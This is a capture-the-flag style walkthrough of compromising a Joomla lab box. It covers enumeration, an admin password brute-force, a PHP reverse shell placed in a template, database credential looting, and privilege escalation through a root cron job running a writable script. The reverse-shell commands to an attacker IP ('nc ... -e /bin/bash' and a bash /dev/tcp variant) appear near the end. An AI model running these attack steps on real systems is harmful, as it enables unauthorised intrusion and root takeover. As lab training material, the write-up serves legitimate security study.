RATING
Hard
ENUMERATION
We kick things off with our nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.250.79

Navigating to our target in a browser doesn't reveal much, so we move on to directory brute-forcing with feroxbuster and turn up two interesting entries, /joomla and /joomla/administrator:
Command: feroxbuster -u http://192.168.250.79/ -w /usr/share/wordlists/dirb/big.txt -k --quiet

Navigating to http://192.168.250.79/joomla, we see a single blog entry. Nothing interesting on its own, but the words in the post are exactly the kind of material a themed box reuses as passwords, so we turn the page into a wordlist:

cewl crawls the page and extracts its words. The -m 5 switch sets a minimum word length of five characters, which drops filler such as "for" and "the" and keeps the list short enough to brute-force with:
Command: cewl -m 5 http://192.168.250.79/joomla/ > pass.txt

Using nmap's http-joomla-brute script with that list, we brute-force the password for the user joomla (the only name in our users.txt). The uri argument must point at the administrator login page, and threads=3 keeps the attempt rate low enough not to trip Joomla's login throttling:
Command: nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=pass.txt,http-joomla-brute.hostname=192.168.250.79,http-joomla-brute.uri=/joomla/administrator/index.php,http-joomla-brute.threads=3' -Pn 192.168.250.79
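To make visible what the cewl minimum-length switch actually does to the candidate list, here is a small offline stand-in for cewl's tokenising step. This is an added example, not part of the original writeup; the HTML it processes is a constructed stand-in for the blog page, and it does not crawl links the way cewl does.

```shell
#!/bin/sh
# Added example (not from the original writeup): a minimal cewl-style
# tokeniser so the effect of "cewl -m 5" can be seen offline. Reads HTML
# on stdin, strips tags, splits on anything that is not a letter and keeps
# unique words of at least N letters. Unlike cewl it does not follow links.

site_wordlist() {                      # usage: site_wordlist MIN_LEN < page.html
    min_len="${1:-5}"
    sed 's/<[^>]*>/ /g' \
    | LC_ALL=C tr -cs 'A-Za-z' '\n' \
    | awk -v n="$min_len" 'length($0) >= n' \
    | LC_ALL=C sort -u
}

# Constructed stand-in for the blog page (assumption: not the real content).
SAMPLE_HTML='<html><body><h1>Welcome to Gotham</h1>
<p>The night is dark for the citizens of Gotham, and the Joker laughs.</p>
</body></html>'

# Number of candidate words that survive a given minimum length.
candidate_count() {                    # usage: candidate_count MIN_LEN
    printf '%s\n' "$SAMPLE_HTML" | site_wordlist "$1" | wc -l | tr -d ' '
}

# Exit 0 if WORD survives the filter at MIN_LEN, 1 otherwise.
has_word() {                           # usage: has_word WORD MIN_LEN
    printf '%s\n' "$SAMPLE_HTML" | site_wordlist "$2" | grep -qx -- "$1"
}

# Emit the list the way the writeup uses it: one candidate per line.
printf '%s\n' "$SAMPLE_HTML" | site_wordlist 5
```

Note that case is preserved: the list contains Gotham, not gotham, which matters here because the password that works is the capitalised form. With -m 3 the same page yields eleven words including "the" and "The"; with -m 5 it yields six.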

Navigating over to http://192.168.250.79/joomla/administrator, discovered earlier with feroxbuster, we find an admin login:

EXPLOITATION
After logging in with joomla:Gotham, we land on the Joomla administrator control panel:

Under Extensions -> Templates -> Templates we open the Protostar template's Details and Files view, which lets us edit the template's index.php directly in the browser. Replacing its contents with a PHP reverse shell means the payload runs the next time anyone requests a page rendered with that template, including the site's front page:

Note: Please be aware that from this moment on, the IP address of our target has changed here because I was having trouble with the box and had to come back to it at a later time.
After starting a netcat listener and requesting http://192.168.219.79/joomla, we catch the reverse shell as www-data and upgrade it to a pty (use python3 if the box has no python binary):
Command: nc -nvlp 1234
Command: python -c 'import pty; pty.spawn("/bin/bash")'

Looking around the system, we find a second web root at /var/www/joomla2 and, inside it, Joomla's configuration.php, which stores the site's database credentials in clear text:

Viewing the file gives us the MySQL username and password and the name of the database the site uses:

We log into the local MySQL instance with those credentials and list the databases:
Command: mysql -ujoomla -pbabyjoker
Command: show databases;
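Looting a Joomla configuration.php is a step worth scripting, because a host with several web roots (this one has joomla and joomla2) may carry several sets of credentials. The following is an added example, not code from the writeup: it extracts the connection properties from every configuration.php under a given directory. The demo directory under /tmp and the config file written into it are constructed from the values the writeup reports.

```shell
#!/bin/sh
# Added example (not from the original writeup): pull the database
# credentials out of every Joomla configuration.php under a web root, so
# the check can be repeated on each site a host serves. The sample file
# below is constructed from the values the writeup reports; the path
# /tmp/joomla_demo is an assumption for this demo only.

# Extract one "public $NAME = 'value';" property from a Joomla config file.
joomla_cfg_get() {                     # usage: joomla_cfg_get FILE NAME
    sed -n "s/^[[:space:]]*public[[:space:]]*[\$]$2[[:space:]]*=[[:space:]]*'\([^']*\)';.*/\1/p" "$1" | head -n 1
}

# Print user:password@host/db for every configuration.php under WEBROOT.
joomla_db_creds() {                    # usage: joomla_db_creds WEBROOT
    find "$1" -type f -name configuration.php 2>/dev/null | while read -r cfg; do
        printf '%s:%s@%s/%s\n' \
            "$(joomla_cfg_get "$cfg" user)" \
            "$(joomla_cfg_get "$cfg" password)" \
            "$(joomla_cfg_get "$cfg" host)" \
            "$(joomla_cfg_get "$cfg" db)"
    done
}

# Constructed stand-in for /var/www/joomla2/configuration.php.
demo_root="${TMPDIR:-/tmp}/joomla_demo"
mkdir -p "$demo_root/joomla2"
cat > "$demo_root/joomla2/configuration.php" <<'EOF'
<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'joomla';
    public $password = 'babyjoker';
    public $db = 'batjoke';
    public $dbprefix = 'jos_';
}
EOF

joomla_db_creds "$demo_root"           # joomla:babyjoker@localhost/batjoke
```

The output format is deliberately one line per site so it can be fed straight into a loop that runs mysql -h host -u user -ppassword db -e 'show tables;' for each hit. The sed pattern anchors on the property name followed by whitespace or '=', which is why $db is matched but $dbprefix is not.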

We switch to the batjoke database, list its tables and dump the taskforce table:
Command: use batjoke;
Command: show tables;
Command: select * from taskforce;

The taskforce table holds what look like password hashes, but the value stored for user rob is not a hash at all, just base64. Decoding it gives the passphrase ???AllIHaveAreNegativeThoughts???:
Command: echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d

With this passphrase, we SSH into the target as rob:
Command: ssh rob@192.168.219.79

Looking around rob's home directory, we see a file named Abnerineedyourhelp. Its contents are a message that appears to be enciphered:
Command: ls -la
Command: cat Abnerineedyourhelp

The text is ROT13, so we decipher it in CyberChef by applying ROT13 again (the cipher is its own inverse):

We then grab the base64 encoded string at the end and decode it to reveal the passphrase I33hope99my0death000makes44more8cents00than0my0life0, this time for user abner:
Command: echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d
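Both decoding steps above (rob's base64 "hash" from the database, then the ROT13 note with a base64 token at its end) can be done in the shell without CyberChef. The following is an added example, not part of the original writeup. It also adds the check a practitioner wants before blindly base64-decoding a credential column: a hex MD5 happens to be valid base64 by alphabet and length, so the function only treats a value as base64 if it decodes to printable text. The note file it writes is a constructed stand-in for Abnerineedyourhelp, and it assumes the whole note, base64 token included, was ROT13-encoded.

```shell
#!/bin/sh
# Added example (not from the original writeup): the two decoding steps from
# the shell, plus a sanity check that separates a base64 blob (rob's "hash")
# from a real hash before decoding. The note file below is a constructed
# stand-in for Abnerineedyourhelp; its path is an assumption for this demo.

# ROT13 maps A-M to N-Z and back, so one tr call both encodes and decodes.
rot13() { LC_ALL=C tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

# Heuristic: base64 alphabet, length divisible by 4, and decodes to printable
# text. A hex MD5 such as 5f4dcc3b... passes the first two checks but decodes
# to binary junk, which is what separates it from rob's value.
is_text_base64() {                     # usage: is_text_base64 STRING
    printf '%s' "$1" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$' || return 1
    [ $(( ${#1} % 4 )) -eq 0 ] || return 1
    if printf '%s' "$1" | base64 -d 2>/dev/null | LC_ALL=C grep -aq '[^[:print:]]'; then
        return 1
    fi
    return 0
}

# Decode a credential-column value if it is really base64; echo it unchanged otherwise.
decode_db_value() {                    # usage: decode_db_value STRING
    if is_text_base64 "$1"; then
        printf '%s' "$1" | base64 -d 2>/dev/null
    else
        printf '%s' "$1"
    fi
}

# Undo the ROT13 on a note and return its last whitespace-separated token,
# which in rob's note is the base64 string carrying abner's passphrase.
# Assumption: the whole note, token included, was ROT13-encoded.
note_token() {                         # usage: note_token FILE
    rot13 < "$1" | tr -s '[:space:]' '\n' | grep -v '^$' | tail -n 1
}

# Constructed stand-in for rob's note: plaintext plus the real base64 string
# from the writeup, ROT13-encoded wholesale as the assumption above says.
note_file="${TMPDIR:-/tmp}/Abnerineedyourhelp.demo"
printf '%s\n' 'Abner I need your help, the passphrase is below:' \
    'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' \
    | rot13 > "$note_file"

decode_db_value 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/'; echo
rot13 < "$note_file"
decode_db_value "$(note_token "$note_file")"; echo
```

The printable-text test is a heuristic, not proof: a short binary hash could by chance decode to printable bytes. It is enough to avoid the common mistake of "decoding" a real hash into garbage and then trying that garbage as a password.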

With this passphrase, we are able to switch over to user abner:
Command: su abner

Using find to search for files owned by abner, we discover a hidden archive, .dear_penguins.zip:

The archive is password protected, but abner reused his own passphrase I33hope99my0death000makes44more8cents00than0my0life0 for it. Extracting it reveals another message and what looks like a further passphrase, scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz:
Command: unzip .dear_penguins.zip

We use this new passphrase to switch to user penguin:
Command: su penguin

PRIVILEGE ESCALATION
Looking through penguin's home directory, we find a directory named SomeoneWhoHidesBehindAMask. Inside it are two files of interest: PeopleAreStartingToNotice.txt, and .trash_old, which is owned by root yet writable by us:
Command: ls -la

Viewing the contents of PeopleAreStartingToNotice.txt, we see mention of some software that only runs with root permissions:

.trash_old is the interesting one: owned by root, writable by us, and on inspection an empty shell script. Whether root ever runs it is the question:
Command: cat .trash_old

To answer that without root, we transfer pspy64 from our machine and run it; pspy watches process creation through procfs and shows cron jobs and other users' commands without any special privileges:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.153/pspy64 (on target machine)
Command: chmod +x pspy64
Command: ./pspy64

Within a minute pspy shows .trash_old being executed by root on a one-minute cron schedule:

Since root executes whatever the script contains, we add the line nc 192.168.45.153 1234 -e /bin/bash to .trash_old, start a listener, and on the next run of the job catch a root shell and read proof.txt:
Command: nc -nvlp 1234
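The root path on this box is a textbook one: a root cron job executing a script that an unprivileged user can write to. The following is an added example, not part of the original writeup, that audits for exactly that pattern on any cron files you point it at (for instance /etc/crontab and /etc/cron.d/*); the crontab and scripts it creates under /tmp are constructed demo data standing in for the .trash_old job, and the /tmp path is an assumption for this demo only.

```shell
#!/bin/sh
# Added example (not from the original writeup): an audit for the pattern
# that hands out root here, a script run from cron that the current user can
# write to. It pulls every absolute path out of each cron command line and
# reports the ones that are writable. Files under /tmp are constructed demo data.

# Print "CRONFILE<TAB>PATH" for each writable absolute path named in a cron
# command. Works for both the 6-field user format and the 7-field system
# format because it only looks for tokens starting with "/". Comment lines,
# blank lines and VAR=value lines are skipped; /dev/* (the usual "> /dev/null")
# is ignored since it is writable by design.
writable_cron_targets() {              # usage: writable_cron_targets FILE...
    for cronfile in "$@"; do
        [ -r "$cronfile" ] || continue
        grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_]+=' "$cronfile" \
        | tr -s '[:space:]' '\n' \
        | grep '^/' | grep -v '^/dev/' | LC_ALL=C sort -u \
        | while read -r path; do
              if [ -w "$path" ]; then
                  printf '%s\t%s\n' "$cronfile" "$path"
              fi
          done
    done
}

# Constructed demo: a system crontab that runs an empty, writable script every
# minute (the .trash_old situation), a read-only script nightly, and a script
# that does not exist at all.
demo="${TMPDIR:-/tmp}/cron_audit_demo"
rm -rf "$demo"
mkdir -p "$demo/home"
: > "$demo/home/.trash_old";  chmod 666 "$demo/home/.trash_old"
: > "$demo/home/nightly.sh";  chmod 444 "$demo/home/nightly.sh"
cat > "$demo/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root /bin/sh $demo/home/.trash_old > /dev/null 2>&1
0 3 * * * root /bin/sh $demo/home/nightly.sh
15 4 * * * root $demo/home/missing.sh
EOF

writable_cron_targets "$demo/crontab"  # reports .trash_old (and /bin/sh too if you run this as root)
```

Two caveats for the real thing. First, the test is the current user's write access, so run it as the low-privileged account you actually hold; run as root it reports everything. Second, the payload the writeup drops relies on a netcat build that supports -e; on a box with the OpenBSD netcat, the same effect comes from writing a bash redirect such as bash -i >& /dev/tcp/192.168.45.153/1234 0>&1 into the script instead, and the writeup's listener catches it unchanged.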
